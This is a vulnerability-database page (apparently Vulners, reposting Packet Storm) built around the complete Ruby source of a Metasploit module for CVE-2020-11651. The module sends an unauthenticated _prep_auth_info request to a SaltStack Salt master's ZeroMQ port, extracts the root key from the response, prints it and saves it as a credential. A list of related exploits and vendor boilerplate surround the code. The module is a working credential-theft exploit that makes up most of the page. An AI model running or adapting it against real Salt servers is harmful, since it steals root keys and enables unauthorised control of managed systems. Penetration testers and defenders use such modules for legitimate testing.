Vulners
Lucene search
SaltStack Salt Master Server Root Key Disclosure
🗓️ 31 Aug 2024 00:00:00Reported by wvu, F-Secure, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 257 Views
| Reporter | Title | Published | Views | Family All 178 |
|---|---|---|---|---|
 | Saltstack 3000.1 - Remote Code Execution Exploit | 4 May 202000:00 | – | zdt |
| Saltstack 3000.1 Remote Code Execution Exploit | 7 May 202000:00 | – | zdt |
| SaltStack Salt Master/Minion Unauthenticated Remote Code Execution Exploit | 12 May 202000:00 | – | zdt |
 | Exploit for CVE-2020-11651 | 4 May 202011:52 | – | githubexploit |
| Exploit for CVE-2020-11651 | 7 May 202009:17 | – | githubexploit |
| Exploit for CVE-2020-11651 | 4 May 202011:47 | – | githubexploit |
| Exploit for CVE-2020-11651 | 4 May 202020:34 | – | githubexploit |
| Exploit for CVE-2020-11651 | 7 May 202009:17 | – | githubexploit |
| Exploit for Path Traversal in Saltstack Salt | 17 Jan 202404:15 | – | githubexploit |
| Exploit for CVE-2020-11651 | 7 May 202004:41 | – | githubexploit |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::ZeroMQ
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SaltStack Salt Master Server Root Key Disclosure',
'Description' => %q{
This module exploits unauthenticated access to the _prep_auth_info()
method in the SaltStack Salt master's ZeroMQ request server, for
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
root key used to authenticate administrative commands to the master.
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as
well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual
Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,
1.3, 1.5, and 1.6 in certain configurations, are known to be affected
by the Salt vulnerabilities.
Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
well as Vulhub's Docker image.
},
'Author' => [
'F-Secure', # Discovery
'wvu' # Module
],
'References' => [
['CVE', '2020-11651'], # Auth bypass (used by this module)
['CVE', '2020-11652'], # Authed directory traversals (not used here)
['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],
['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
],
'DisclosureDate' => '2020-04-30', # F-Secure advisory
'License' => MSF_LICENSE,
'Actions' => [
['Dump', { 'Description' => 'Dump root key from Salt master' }]
],
'DefaultAction' => 'Dump',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options([
Opt::RPORT(4506)
])
end
def run
# These are from Msf::Exploit::Remote::ZeroMQ
zmq_connect
zmq_negotiate
unless (root_key = extract_root_key(yeet_prep_auth_info))
print_error('Could not find root key in serialized auth info')
# Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
return Exploit::CheckCode::Safe
end
print_good("Root key: #{root_key}")
# I hate this API, but store the root key in creds, too
create_credential_and_login(
workspace_id: myworkspace_id,
module_fullname: fullname,
origin_type: :service,
address: rhost,
port: rport,
protocol: 'tcp',
service_name: 'salt/zeromq',
username: 'root',
private_data: root_key,
private_type: :password
)
# Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!
rescue EOFError, Rex::ConnectionError => e
print_error("#{e.class}: #{e.message}")
Exploit::CheckCode::Unknown
ensure
# This is from Msf::Exploit::Remote::ZeroMQ
zmq_disconnect
end
def yeet_prep_auth_info
print_status("Yeeting _prep_auth_info() at #{peer}")
zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))
unless (res = sock.get_once)
fail_with(Failure::Unknown, 'Did not receive auth info')
end
unless res.match(/user.+UserAuthenticationError.+root/m)
fail_with(Failure::UnexpectedReply,
"Did not receive serialized auth info: #{res.inspect}")
end
vprint_good('Received serialized auth info')
# HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load"
res[4..]
end
def extract_root_key(auth_info)
# Fetch root key from appropriate index of deserialized data, presumably
MessagePack.unpack(auth_info)[2]&.fetch('root')
rescue EOFError, KeyError, MessagePack::MalformedFormatError => e
print_error("#{__method__} failed: #{e.message}")
nil
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.94234